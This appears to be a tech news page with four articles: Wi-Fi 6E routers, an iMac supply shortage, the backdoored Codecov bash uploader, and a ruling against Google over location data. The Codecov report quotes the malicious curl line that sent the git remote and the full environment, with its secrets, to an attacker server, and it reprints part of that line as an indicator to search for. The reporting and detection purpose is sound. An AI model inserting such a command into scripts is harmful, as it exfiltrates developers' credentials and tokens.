Connect with us


Wi-Fi 6E arrives at CES 2021



Wi-Fi 6E is very slowly coming to a product near you. The Wi-Fi Alliance started certifying devices on January 7, and CES 2021 saw plenty of product announcements related to the Wi-Fi 6E rollout.

Wi-Fi 6E, if you haven’t heard, is a new standard for Wi-Fi that was approved by the FCC last year. While Wi-Fi 6 (no “e,” aka 802.11ax) is a bunch of technical improvements mostly aimed at more efficient usage of existing spectrum, Wi-Fi 6E is all about expanding Wi-Fi to a newly freed-up chunk of spectrum. Previously, Wi-Fi only worked on the 2.4Ghz and 5GHz spectrum, but Wi-Fi 6E uses the 6GHz spectrum. In the United States, 6E has a huge chunk of continuous spectrum—1200MHz. Previously, 5GHz only offered 140MHz of useful, non-DFS spectrum, and 2.4 GHz only had 70MHz of very crowded spectrum, which is vulnerable to running microwaves and other interference.

Neither Wi-Fi 6 or Wi-Fi 6E is about more speed—both are more about dealing with Wi-Fi capacity issues, which frequently rear their heads in apartment buildings and large public gatherings. If your Wi-Fi is currently terrible due to crowded airwaves in a densely populated area, Wi-Fi 6E could greatly improve your wireless performance. Getting on Wi-Fi 6E will mean buying new clients and new access points, though, hence this roundup article.

Enlarge / The Samsung Galaxy S21 Ultra and MSI GE76 Raider.


The highest-profile device at CES was the Samsung Galaxy S21, and while the cheaper variants don’t have Wi-Fi 6E, the $1,200 “Ultra” model does, and by most accounts, it is “the world’s first Wi-Fi 6E phone.” Expect this trend to continue for most Android phones in 2021. Wi-Fi 6E is an option on the Snapdragon 888 SoC that will end up in most flagship devices, and you’ll probably see the more expensive models adopt it.

Wi-Fi 6E is coming to laptops, too. MSI’s GE76 Raider looks like it will be the first Wi-Fi 6E laptop, thanks to Intel’s AX210 Wi-Fi card. The Intel AX210 card is for sale to users, by the way, so you can upgrade most desktops and laptops to Wi-Fi 6E yourself, right now, with an add-in card. Clients are coming, so what we need are Wi-Fi 6E access points, or “routers” when you’re talking about the all-in-one consumer-grade network equipment. Most of the big consumer network brands showed up to CES with a Wi-Fi 6E router to show off.

The Asus ROG Rapture GT-AXE11000

We’re starting with the router closest to hitting general availability: the Asus ROG Rapture GT-AXE11000. This was announced all the way back in September as the “World’s first Wi-Fi 6E gaming router,” but it finally got a release window: January 2021. Newegg currently has it for preorder for a cool $549.99 with a release date of January 29, but some reports are saying the router is already shipping. Like with many “Gaming” routers, the GT-AXE1100 has a crazy design that looks like it could flip over and start walking around like a spider at any moment.

Besides the usual 4x gigabit LAN ports on the back and a gigabit WAN port, there’s also an extra 2.5Gbps port on the back, which you can configure for WAN or LAN. A 2.5gig WAN port sounds like something that would be increasingly useful in the future, but I don’t think there are any consumer-grade modems that could take advantage of that yet. Comcast has a 2Gbps service, but that seems to rely on modems that can do link aggregation across two gigabit Ethernet ports. Google has a very limited 2Gbps Internet service, but that comes with its own networking gear and according to the sign-up page, “customers will not be able to use their own router.” Plan for the future, I guess!

Most of the specs on these routers just reiterate the standard Wi-Fi 6/6E features, but Asus does list a 1.8GHz 64-bit Quad-core CPU with 1GB RAM, which sounds like it can handle a lot of traffic without slowing down. The router supports 4×4 MU-MIMO for 5GHz and 6GHz, for a theoretical top speed of 4.8Gbps. There are also two USB 3.2 ports on the side for a cheap NAS setup.

Netgear Nighthawk AXE11000

Requesting permission to dock into starbase, it’s the Netgear Nighthawk AXE11000 Wi-Fi Router. The Nighthawk seems to hit all the same specs as the Asus router but is $50 more: a whopping $599.99.

Stop me if this sounds familiar: a 1.8GHz quad-core processor and a gig of memory, 4×4 MU-MIMO for 5GHz and 6GHz, two USB 3.0 ports, gigabit WAN, 4 gigabit LAN, and a 2.5gig port for WAN or LAN. Just like the Asus router, there are eight antennas, but instead of the spider design, four antennas live in each wingtip.

Netgear’s entry in the Wi-Fi 6E router contest is up for preorder now, with an estimated availability of March 15.

The Linksys AXE8400

If you’ve ever wondered what a white Xbox Series X would look like, meet the Linksys AXE8400. This is easily the least-crazy design of the new Wi-Fi 6E routers, and since putting a router in a centralized, visible location is one of the best things you can do for connectivity, that might be a big deal to you. (Fun fact: this Linksys design dates back at least to 2018 and therefore predates the new Xbox by a long time! There is even an older version that comes in black, if you’ve ever wanted a mini-me version of Microsoft’s game console.)

The Linksys has the distinction of being a mesh router and comes in $449.99 for a 1-pack, $849.99 for a 2-pack, and $1,199.99 for a 3-pack. Linksys’ press release lists the US release date as “Spring/Summer 2021” with “global availability to follow in the second half of 2021.” Mesh routers have the potential to benefit the most quickly from the 6GHz spectrum opening up, since they could use 6GHz for the backhaul between access points, freeing up 5GHz purely for client connections.

Wth no public datasheet yet, very little important detail is provided about the AXE8400 right now. Just from the pictures, there are four LAN ports on the back of indeterminate speed, along with a single USB 3.x port. The WAN port is labeled “5Gbps Internet,” so it sounds like Linksys is really ready for modems with multi-gigabit ports, if they are ever produced.

The one interesting tech spec Linksys is publishing right now is that the AXE8400 has a “Qualcomm Networking Pro 1210” chipset at its heart, Qualcomm’s designated platform for companies looking to build a Wi-Fi 6E router. This is a quad-core 2.2Ghz Cortex A53 chip, built on a 14nm process technology.

Linksys’ website is also teasing what looks like a non-mesh Wi-Fi 6E router, but we don’t even have a name for it yet.

TP-Link brought an SFP+ port to the party?!

Coming in last with no release date or price at all, we have a pair of TP-Link routers. First up, the TP-Link Archer AX206, which has Wi-Fi 6E with 4×4 MU-MIMO. What’s interesting here are some serious wired networking options. It’s a shame TP-Link only provided a single, overhead image, because the back of this thing sounds very busy: a USB-C port, a USB-A port, four gigabit Ethernet ports, a 2.5 Gbps WAN/LAN port, a 10Gbps WAN/LAN port, and, for when you want to get really serious, a 10Gbps SFP+ WAN/LAN port, for a fiber-optic connection. Whoa.

The SFP+ port is an attention grabber, but I can’t say I really understand the market segmentation here. SFP+ ports are normally used for backhaul in business-style networks (or the home-lab crowd) for connecting one device in your network rack to another. I can’t imagine a Rackmount-American wanting to touch one of these consumer-grade plastic combo-boxes with a 10-foot pole. I have a hard time imagining selling a ~$40 fiber-optic cable to a non-network-enthusiast, and even if you could do that, TP-Link’s consumer division doesn’t sell any other SFP+ gear. In a world where we can’t even get modem manufacturers to move beyond gigabit Ethernet, what is a normal person supposed to do with an SPF+ port? I guess more options are always better, but we’ll have to see what the price tag is like for these fancy, questionably useful extras.

Finally from TP-Link is the Archer AX96, and while, again, there is no price or release date, this sounds like it will be a cheaper Wi-Fi 6E router. The main hint is the speed rating for the 6GHz Wi-Fi 6E, which only hits “2402 Mbps,” which indicates that this router only does 2×2 MIMO on the 6GHz spectrum, or half the speed of the Asus and Netgear routers. 5GHz still looks like 4×4 MIMO, so this router would allow for a baby step into 6GHz.

On the back (again, there are no pictures), there are 2.5Gbps and 1Gbps WAN/LAN ports, three 1Gbps LAN ports, one USB 3 port, and a USB 2 port.

Listing image by Asus

Continue Reading


21.5-inch iMac supply dwindles amid chip shortages, possible refresh



Apple’s low-end, 21.5-inch iMac appears to be in short supply at Apple Stores and in Apple’s online storefront in the United States. The shortage could be a hint of an imminent change to the iMac lineup just a few days before Apple hosts a product launch event on April 20.

In particular, the cheapest, 1080p iMac (the rest of the 21.5-inch models have 4K displays) is seeing ship dates slipping back several days into late April or early May, which is usually a sign of low supply. This Mac in particular is also increasingly unavailable for pickup at physical Apple Stores around the US.

Meanwhile, the more expensive 27-inch iMac is shipping within a normal window, and it is showing as available at more retail stores.

This development comes a few weeks after Apple discontinued several certain configurations of the 21.5-inch iMac—specifically, those with 512GB of 1TB SSD storage options. You can currently buy 21.5-inch iMacs with 256GB of solid-state storage, or a 1TB configuration that combines an SSD with an older hard drive.

Historically, changes like these have often been signs of imminent new product launches or discontinuations. But there is one wrinkle that makes that less of a sure thing this time: a worldwide chip shortage that may impact Apple’s products. The shortage has impacted many other tech and gadget companies already, and it may be the cause here, too.

M1 first, M1X later?

We’re speculating here, but the fact that only the lower-end models are seeing significant shortages while the 27-inch iMac is business as usual seems like a promising sign for an imminent product launch.

As we explained in our article on what to expect from Apple’s upcoming event, Apple is most likely to upgrade a low-end iMac before it addresses the faster, more expensive configurations.

An entry-level iMac would probably feature Apple’s M1 chip, the same seen in other low-end Macs late last year, while a higher-end model would need a new chip that Apple has not yet introduced, such as an “M1X.”

This split could explain why some leaks and rumors have said an iMac update is coming next week, while others say it will be later in the year. But again, today’s news could be the result of chip shortages rather than a change in Apple’s product lineup.

In any case, we’ll find out one way or another when Apple holds its event on Tuesday next week.

Listing image by Samuel Axon

Continue Reading


Backdoored developer tool that stole credentials escaped notice for 3 months



Getty Images

A publicly available software development tool contained malicious code that stole the authentication credentials that apps need to access sensitive resources. It’s the latest revelation of a supply chain attack that has the potential to backdoor the networks of countless organizations.

The Codecov bash uploader contained the backdoor from late January to the beginning of April, developers of the tool said on Thursday. The backdoor caused developer computers to send secret authentication tokens and other sensitive data to a remote site controlled by the hackers. The uploader works with development platforms including Github Actions, CircleCI, and Bitrise Step, all of which support having such secret authentication tokens in the development environment.

A pile of AWS and other cloud credentials

The Codecov bash uploader performs what is known as code coverage for large-scale software development projects. It allows developers to send coverage reports that, among other things, determine how much of a codebase has been tested by internal test scripts. Some development projects integrate Codecov and similar third-party services into their platforms, where there is free access to sensitive credentials that can be used to steal or modify source code.

Code similar to this single line first appeared on January 31:

curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” https:///upload/v2 || true

The code sends both the GitHub repository location and the entire process environment to the remote site, which has been redacted because Codecov says it’s part of an ongoing federal investigation. These types of environments typically store tokens, credentials, and other secrets for software in Amazon Web Services or GitHub.

Armed with these secrets, there’s no shortage of malicious things an attacker could do to development environments that relied on the tool, said HD Moore, a security expert and the CEO of network discovery platform Rumble.

“It really depends on what was in the environment, but from the point that attackers had access (via the bash uploader), they might have been able to plant backdoors on the systems where it ran,” he wrote in a direct message with Ars. “For GitHub/CircleCI, this would have mostly exposed source code and credentials.”

Moore continued:

The attackers likely ended up with a pile of AWS and other cloud credentials in addition to tokens that could give them access to private repositories, which includes source code, but also all the other stuff that the token was authorized for. On the extreme end, these credentials would be self-perpetuating—the attackers use a stolen GitHub token to backdoor the source code, which then steals downstream customer data, etc. The same could apply to AWS and other cloud credentials. If the credentials allowed for it, they could enable infrastructure takeover, database access, file access, etc.

In Thursday’s advisory, Codecov said the malicious version of the bash uploader could access:

  • Any credentials, tokens, or keys that our customers were passing through their CI runner that would be accessible when the bash uploader script was executed
  • Any services, datastores, and application code that could be accessed with these credentials, tokens, or keys
  • The git remote information (URL of the origin repository) of repositories using the bash uploaders to upload coverage to Codecov in CI

“Based upon the forensic investigation results to date, it appears that there was periodic unauthorized access to a Google Cloud Storage (GCS) key beginning January 31, 2021, which allowed a malicious third-party to alter a version of our bash uploader script to potentially export information subject to continuous integration (CI) to a third-party server,” Codecov said. “Codecov secured and remediated the script April 1, 2021.”

The Codecov advisory said that a bug in Codecov’s Docker image-creation process allowed the hacker to extract the credential required to modify the bash uploader script.

The tampering was discovered on April 1 by a customer who noticed that the shasum that acts as a digital fingerprint to confirm the integrity of bash uploader didn’t match the shasum for the version downloaded from The customer contacted Codecov, and the tool maker pulled the malicious version and started an investigation.

Codecov is urging anyone who used the bash updater during the affected period to revoke all credentials, tokens, or keys located in CI processes and create new ones. Developers can determine what keys and tokens are stored in a CI environment by running the env command in the CI Pipeline. Anything sensitive should be considered compromised.

Additionally, anyone who uses a locally stored version of the bash uploader should check it for the following:

Curl -sm 0.5 -d “$(git remote -v)

If these commands appear anywhere in a locally stored bash uploader, users should immediately replace it with the most recent version from

Codecov said that developers using a self-hosted version of bash update are unlikely to be affected. “To be impacted, your CI pipeline would need to be fetching the bash uploader from instead of from your self-hosted Codecov installation. You can verify from where you are fetching the bash uploader by looking at your CI pipeline configuration,” the company said.

The appeal of supply chain attacks

The compromise of Codecov’s software development and distribution system is the latest supply chain attack to come to light. In December, a similar compromise hit SolarWinds, the Austin, Texas maker of network management tools used by about 300,000 organizations around the world, including Fortune 500 companies and government agencies.

The hackers who carried out the breach then distributed a backdoored update that was downloaded by about 18,000 customers. About 10 US federal agencies and 100 private companies eventually received follow-on payloads that sent sensitive information to attacker-controlled servers. FireEye, Microsoft, Mimecast, and Malwarebytes were all swept up in the campaign.

More recently, hackers carried out a software supply chain attack that was used to install surveillance malware on the computers of people using NoxPlayer, a software package that emulates the Android operating system on PCs and Macs, mainly so users can play mobile games on those platforms. A backdoored version of NoxPlayer was available for five months, researchers from ESET said.

The appeal of supply chain attacks to hackers is their breadth and effectiveness. By compromising a single player high in the software supply, hackers can potentially infect any person or organization who uses the compromised product. Another feature that hackers find beneficial: there’s often little or nothing targets can do to detect malicious software distributed this way because digital signatures will indicate that it’s legitimate.

In the case of the backdoored bash update version, however, it would have been easy for Codecov or any of its customers to detect the malice by doing nothing more than checking the shasum. The ability for the malicious version to escape notice for three months indicates that no one bothered to perform this simple check.

People who have used the bash updater between January 31 and April 1 should carefully inspect their development builds for signs of compromise by following the steps outlined in Thursday’s advisory.

Continue Reading


Google loses “Location History” court battle in Australia



The Australian Competition & Consumer Commission (ACCC) has ruled that Google misled Android users over its collection of location data. This ruling is in reference to the “Location History” controversy from a few years ago. The Associated Press reported at the time that turning off the Location History setting does not disable all location-tracking features across every Google product.

The ACCC’s press release states that from January 2017 to December 2018 (the AP article was published in August 2018), “Google misrepresented that the ‘Location History’ setting was the only Google Account setting that affected whether Google collected, kept or used personally identifiable data about their location.” The ruling continues, saying, “In fact, another Google Account setting titled ‘Web & App Activity’ also enabled Google to collect, store and use personally identifiable location data when it was turned on, and that setting was turned on by default.”

With the ACCC’s finding of wrongdoing, it’s not clear what the Australian government plans to do about the situation yet. The press release says, “The ACCC is seeking declarations, pecuniary penalties, publications orders, and compliance orders. This will be determined at a later date.” ACCC Chair Rod Sims added, “In addition to penalties, we are seeking an order for Google to publish a notice to Australian consumers to better explain Google’s location data settings in the future. This will ensure that consumers can make informed choices about whether certain Google settings that… collect location data should be enabled.”

Location History used to only affect data collected through Google Maps. This made sense back in 2012, when Location History started out as a setting inside the Google Maps app. Google’s push for unified privacy settings, as seen in the “My Account” page in 2015, meant that all of these settings were pulled into a single page, and “Location History” lost the Google Maps context it used to have. In 2018, the AP asked, “Why does this setting in my account called ‘Location History’ not turn off location tracking for my entire account?” and a big controversy ensued.

Google changed the Location History settings after the AP’s article, and today the company says the feature is “a Google Account–level setting that saves where you go with every mobile device.” Note that this concerns mobile devices only, and a lot of location data still lives under the “Web and App Activity” setting, which Google vaguely says covers some location data “on Google sites, apps, and services.” As this support article explains, the other two Google location settings you might want to track down are Google Maps location sharing, which is for sharing your location with your friends, and Android’s Google Location Accuracy, (AKA Google Play Service’s Fused Location Provider), which tries to compute a low-power location from Wi-Fi and cellular data without having to fire up the expensive GPS receiver. Google does not do anything in a unified, company-wide fashion, and privacy settings are no exception.

Google’s privacy settings are so vague and confusing that even Google’s own employees don’t understand them, and the settings have already been the subject of at least one lawsuit.

Continue Reading